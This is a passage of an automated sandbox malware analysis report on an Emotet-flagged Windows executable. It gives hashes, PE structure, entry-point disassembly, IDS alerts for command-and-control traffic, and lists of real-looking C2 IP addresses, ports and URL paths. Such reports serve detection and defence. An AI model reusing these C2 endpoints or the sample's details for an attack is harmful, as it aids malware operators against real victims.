                        16276OVHFRtrue
                        201.213.177.139
                        unknownArgentina
                        10481TelecomArgentinaSAARtrue
                        188.251.213.180
                        unknownPortugal
                        3243MEO-RESIDENCIALPTtrue
                        109.242.153.9
                        unknownGreece
                        25472WIND-ASGRtrue
                        85.214.26.7
                        unknownGermany
                        6724STRATOSTRATOAGDEtrue
                        51.75.33.127
                        unknownFrance
                        16276OVHFRtrue
                        188.157.101.114
                        unknownHungary
                        5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUtrue
                        46.43.2.95
                        unknownUnited Kingdom
                        35425BYTEMARK-ASGBtrue
                        59.148.253.194
                        unknownHong Kong
                        9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                        74.58.215.226
                        unknownCanada
                        5769VIDEOTRONCAtrue
                        87.106.46.107
                        unknownGermany
                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1553820
                        Start date and time:2024-11-11 18:21:15 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 4s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:mNtu4X8ZyE.exe
                        renamed because original name is a hash value
                        Original Sample Name:3d1ad8f5c275b10be10f06b5505bee6ae6c80e60.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@6/0@1/100
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 58
                        • Number of non-executed functions: 45
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 20.101.57.9
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: mNtu4X8ZyE.exe
                        TimeTypeDescription
                        12:22:14API Interceptor1x Sleep call for process: mNtu4X8ZyE.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        81.214.253.80ExeFile (107).exeGet hashmaliciousEmotetBrowse
                        • 81.214.253.80:443/k9T0ogQ/wOeTRCAjeZOsy4XFiQ/
                        sample.exeGet hashmaliciousEmotetBrowse
                        • 81.214.253.80:443/EcHFqzWnBKc4hX/EXKH5Mm0mWNMP9/8o0s02d4l/
                        94.176.234.11875A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                          ExeFile (278).exeGet hashmaliciousEmotetBrowse
                            ExeFile (305).exeGet hashmaliciousEmotetBrowse
                              ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                  ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                    ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                      ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                        ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                          ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                            78.206.229.130ExeFile (211).exeGet hashmaliciousEmotetBrowse
                                              LisectAVT_2403002C_62.dllGet hashmaliciousEmotetBrowse
                                                xpng5kkgI.dllGet hashmaliciousEmotetBrowse
                                                  KNEa2w7v3a.exeGet hashmaliciousEmotetBrowse
                                                    Io8ic2291n.docGet hashmaliciousEmotetBrowse
                                                      181.58.181.9ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                        ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                                          ExeFile (286).exeGet hashmaliciousEmotetBrowse
                                                            ExeFile (211).exeGet hashmaliciousEmotetBrowse
                                                              KNEa2w7v3a.exeGet hashmaliciousEmotetBrowse
                                                                213.197.182.15875A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                  ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                                    ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                                                      ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                                                        ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                                                          ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                                                            ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                                                              ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                                                                ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                                                                  ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    RACKRAYUABRakrejusLT75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    G9Z66ZF3Y370FN9E.jsGet hashmaliciousUnknownBrowse
                                                                                    • 79.98.25.1
                                                                                    G9Z66ZF3Y370FN9E.jsGet hashmaliciousUnknownBrowse
                                                                                    • 79.98.25.1
                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 176.223.128.227
                                                                                    ExeFile (278).exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    ExeFile (317).exeGet hashmaliciousEmotetBrowse
                                                                                    • 79.98.24.39
                                                                                    ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                                                                    • 94.176.234.118
                                                                                    TTNETTRsora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 88.254.107.220
                                                                                    sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 78.166.239.52
                                                                                    shindemips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 88.255.203.195
                                                                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 85.100.46.152
                                                                                    5r3fqt67ew531has4231.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 95.8.187.72
                                                                                    yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 88.235.149.95
                                                                                    5r3fqt67ew531has4231.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.245.198.133
                                                                                    5r3fqt67ew531has4231.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.245.198.125
                                                                                    5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.245.198.148
                                                                                    debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 62.248.16.27
                                                                                    PROXADFRsora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 82.225.50.254
                                                                                    botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 78.222.108.142
                                                                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 83.157.71.225
                                                                                    5r3fqt67ew531has4231.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.189.183.27
                                                                                    5r3fqt67ew531has4231.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.165.18.233
                                                                                    yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                                                                    • 78.212.231.98
                                                                                    5r3fqt67ew531has4231.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 88.180.232.157
                                                                                    ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 78.219.16.122
                                                                                    x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 78.217.246.201
                                                                                    sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 78.224.159.162
                                                                                    TelmexColombiaSACObyte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 190.156.99.191
                                                                                    bin.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 190.159.249.139
                                                                                    bin.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 181.54.129.32
                                                                                    sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                    • 190.156.55.4
                                                                                    C6IlHsFs4g.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 190.84.64.227
                                                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 181.62.19.182
                                                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 186.83.234.209
                                                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 190.143.63.161
                                                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 181.61.167.58
                                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                    • 190.146.112.188
                                                                                    No context
                                                                                    No context
                                                                                    No created / dropped files found
                                                                                    File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):6.961491680267367
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    File name:mNtu4X8ZyE.exe
                                                                                    File size:479'232 bytes
                                                                                    MD5:6e30d8bda11412a2272a387b549be17a
                                                                                    SHA1:3d1ad8f5c275b10be10f06b5505bee6ae6c80e60
                                                                                    SHA256:c3ad80d9e8443b1beae2dfe76227770b83fa852b9226f91a5628cb06624d8d9c
                                                                                    SHA512:bbc20aa344c58907b09647a308e204e1728d45efc60911c95c3b52f78bac2b3395b616796f0cc8f22250053a8b777bb38302ecd49fb81164e71912908516ff23
                                                                                    SSDEEP:6144:gu079Bvns6+dSEDVoOhjfbJ0r0dZQ4XYo8Zv/J5QnEZgHmjihGXL/578RdBg9:gD9Z1/2GOxfbQCBURzQ4ga6U8Re
                                                                                    TLSH:A1A422BAC0403AA5D9D25C7046C1BEBB1715CA43C34949EB4675B96FBD1BBCCE0BC09A
                                                                                    File Content Preview:MZ~`.t.].-_.G|.b../.c.!{....).7.ZKcG..).?oj.3 \oR...-.)...3.............!..L.!This program cannot be run in DOS mode....$.......sf!.7.O.7.O.7.O...E.<.O...A.6.O...K.3.O.U.\.3.O.#lN.4.O.7.N...O...D.4.O...I.6.O.Rich7.O.........PE..L......_.................0.
                                                                                    Icon Hash:49484d4b4b066c6e
                                                                                    Entrypoint:0x4020ea
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x5F9B1381 [Thu Oct 29 19:09:53 2020 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:50f8a2255c4baf188eb0098c86160f78
                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push FFFFFFFFh
                                                                                    push 00404000h
                                                                                    push 004022A0h
                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                    push eax
                                                                                    mov dword ptr fs:[00000000h], esp
                                                                                    sub esp, 68h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [ebp-18h], esp
                                                                                    xor ebx, ebx
                                                                                    mov dword ptr [ebp-04h], ebx
                                                                                    push 00000002h
                                                                                    call dword ptr [0040632Ch]
                                                                                    pop ecx
                                                                                    or dword ptr [004059C4h], FFFFFFFFh
                                                                                    or dword ptr [004059D4h], FFFFFFFFh
                                                                                    call dword ptr [00406330h]
                                                                                    mov ecx, dword ptr [004059B4h]
                                                                                    mov dword ptr [eax], ecx
                                                                                    call dword ptr [00406334h]
                                                                                    mov ecx, dword ptr [004059B0h]
                                                                                    mov dword ptr [eax], ecx
                                                                                    mov eax, dword ptr [00406340h]
                                                                                    mov eax, dword ptr [eax]
                                                                                    mov dword ptr [004059B8h], eax
                                                                                    call 00007F43789C1523h
                                                                                    cmp dword ptr [00405844h], ebx
                                                                                    jne 00007F43789C13FEh
                                                                                    push 00402284h
                                                                                    call dword ptr [00406360h]
                                                                                    pop ecx
                                                                                    call 00007F43789C14EFh
                                                                                    push 00405418h
                                                                                    push 00405314h
                                                                                    call 00007F43789C14DAh
                                                                                    mov eax, dword ptr [004059ACh]
                                                                                    mov dword ptr [ebp-6Ch], eax
                                                                                    lea eax, dword ptr [ebp-6Ch]
                                                                                    push eax
                                                                                    push dword ptr [004059A8h]
                                                                                    lea eax, dword ptr [ebp-64h]
                                                                                    push eax
                                                                                    lea eax, dword ptr [ebp-70h]
                                                                                    push eax
                                                                                    lea eax, dword ptr [ebp-60h]
                                                                                    push eax
                                                                                    call dword ptr [00406358h]
                                                                                    push 00405210h
                                                                                    push 00405000h
                                                                                    call 00007F43789C14A7h
                                                                                    Programming Language:
                                                                                    • [ C ] VS98 (6.0) build 8168
                                                                                    • [LNK] VS98 (6.0) imp/exp build 8168
                                                                                    • [C++] VS98 (6.0) build 8168
                                                                                    • [RES] VS98 (6.0) cvtres build 1720
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x60000x78.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x6c0f3.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x218.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x624c0x1d4.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x23bb0x3000718fdc042134f25a5a40717602c1fef4False0.18717447916666666data3.248426933367741IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x40000x10e0x1000d7bfa72795a429a22c2933327a48ac36False0.009521484375data0.02988508912012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x50000x9d80x1000067e9b2b98c39feaedbe17a906add6e0False0.130615234375data1.4966190094799063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .idata0x60000xab80x100039eba814fac73307fa69560b90aa11beFalse0.227294921875data2.933331512837663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x70000x6c0f30x6d0005e68363649596dedb1cb7bae79dad51fFalse0.8062329773509175data7.162307572718082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x740000x77d0x100077d32d9e08808396ded4f36f995f0ea5False0.130615234375data1.3228145100632136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x72e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.2567204301075269
                                                                                    RT_ICON0x75c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.32432432432432434
                                                                                    RT_ICON0x76f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.21695095948827292
                                                                                    RT_DIALOG0x60f000x16adataEnglishUnited States0.580110497237569
                                                                                    RT_RCDATA0x85c80x58933dataEnglishUnited States0.9869460836872903
                                                                                    RT_GROUP_ICON0x85980x30dataEnglishUnited States0.9583333333333334
                                                                                    DLLImport
                                                                                    KERNEL32.dllLoadLibraryA, GetModuleHandleA, GetStartupInfoA, GetProcAddress, GetModuleHandleExA, VirtualAlloc
                                                                                    USER32.dllSetDlgItemTextA, DestroyWindow, DispatchMessageA, GetDlgItemTextA, SetWindowTextA, FindWindowA, PostQuitMessage, GetSystemMenu, AppendMenuA, DefWindowProcA, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetMessageA, DialogBoxParamA, TranslateMessage
                                                                                    GDI32.dllGetStockObject
                                                                                    MSVCRT.dllexit, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, malloc, ??3@YAXPAX@Z, _adjust_fdiv, _onexit, _exit, _XcptFilter, __dllonexit, _acmdln, __getmainargs, _initterm, __setusermatherr
                                                                                    MSVCP60.dll?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ??0Init@ios_base@std@@QAE@XZ, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ??1_Winit@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-11T18:22:34.128040+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749798TCP
                                                                                    2024-11-11T18:22:36.385675+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.749766190.202.229.7480TCP
                                                                                    2024-11-11T18:22:56.826697+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.74993670.39.251.948080TCP
                                                                                    2024-11-11T18:23:08.796039+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.74997887.230.25.438080TCP
                                                                                    2024-11-11T18:23:14.538600+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.749980TCP
                                                                                    2024-11-11T18:23:20.800044+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.74997994.23.62.1168080TCP
                                                                                    2024-11-11T18:23:32.953468+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.74998337.187.161.2068080TCP
                                                                                    2024-11-11T18:23:45.064324+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.74998445.46.37.9780TCP
                                                                                    2024-11-11T18:23:57.482018+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.749985138.97.60.1417080TCP
                                                                                    2024-11-11T18:24:08.284550+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.749986177.144.130.1058080TCP
                                                                                    2024-11-11T18:24:20.133558+01002035077ET MALWARE Win32/Emotet CnC Activity (POST) M111192.168.2.749987169.1.39.24280TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 11, 2024 18:22:28.033673048 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:28.038706064 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:28.038825035 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:28.038981915 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:28.039041042 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:28.043724060 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:28.043853998 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:28.043900967 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:28.043910980 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:28.043921947 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:36.385466099 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:36.385674953 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:36.385982990 CET4976680192.168.2.7190.202.229.74
                                                                                    Nov 11, 2024 18:22:36.390885115 CET8049766190.202.229.74192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.759994984 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:39.765162945 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.765270948 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:39.765384912 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:39.765417099 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:39.770313978 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.770334005 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.770344019 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.770358086 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:39.770390987 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:48.285341024 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:48.285397053 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:48.287019014 CET498527080192.168.2.7118.69.11.81
                                                                                    Nov 11, 2024 18:22:48.291954041 CET708049852118.69.11.81192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.352839947 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:51.357899904 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.357995987 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:51.358166933 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:51.358239889 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:51.363073111 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.363087893 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.363104105 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.363115072 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:51.363250971 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:56.826567888 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:22:56.826697111 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:56.826824903 CET499368080192.168.2.770.39.251.94
                                                                                    Nov 11, 2024 18:22:56.831907034 CET80804993670.39.251.94192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.450185061 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:00.457026005 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.457109928 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:00.457300901 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:00.457340002 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:00.462157011 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.462260962 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.462272882 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.462285042 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:00.462301970 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:08.795907021 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:08.796039104 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:08.796128988 CET499788080192.168.2.787.230.25.43
                                                                                    Nov 11, 2024 18:23:08.800964117 CET80804997887.230.25.43192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.456856012 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:12.461935997 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.462025881 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:12.462187052 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:12.462256908 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:12.467140913 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.467153072 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.467199087 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.467210054 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:12.467226028 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:20.799906015 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:20.800044060 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:20.800173998 CET499798080192.168.2.794.23.62.116
                                                                                    Nov 11, 2024 18:23:20.804981947 CET80804997994.23.62.116192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.582844019 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:24.588320017 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.588397026 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:24.590200901 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:24.590223074 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:24.595071077 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.595082045 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.595117092 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.595127106 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:24.595136881 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:32.953394890 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:32.953468084 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:32.953569889 CET499838080192.168.2.737.187.161.206
                                                                                    Nov 11, 2024 18:23:32.958447933 CET80804998337.187.161.206192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.710030079 CET4998480192.168.2.745.46.37.97
                                                                                    Nov 11, 2024 18:23:36.715105057 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.715250969 CET4998480192.168.2.745.46.37.97
                                                                                    Nov 11, 2024 18:23:36.716316938 CET4998480192.168.2.745.46.37.97
                                                                                    Nov 11, 2024 18:23:36.716373920 CET4998480192.168.2.745.46.37.97
                                                                                    Nov 11, 2024 18:23:36.721196890 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.721229076 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.721240044 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.721251011 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:36.721261978 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:45.064210892 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:45.064323902 CET4998480192.168.2.745.46.37.97
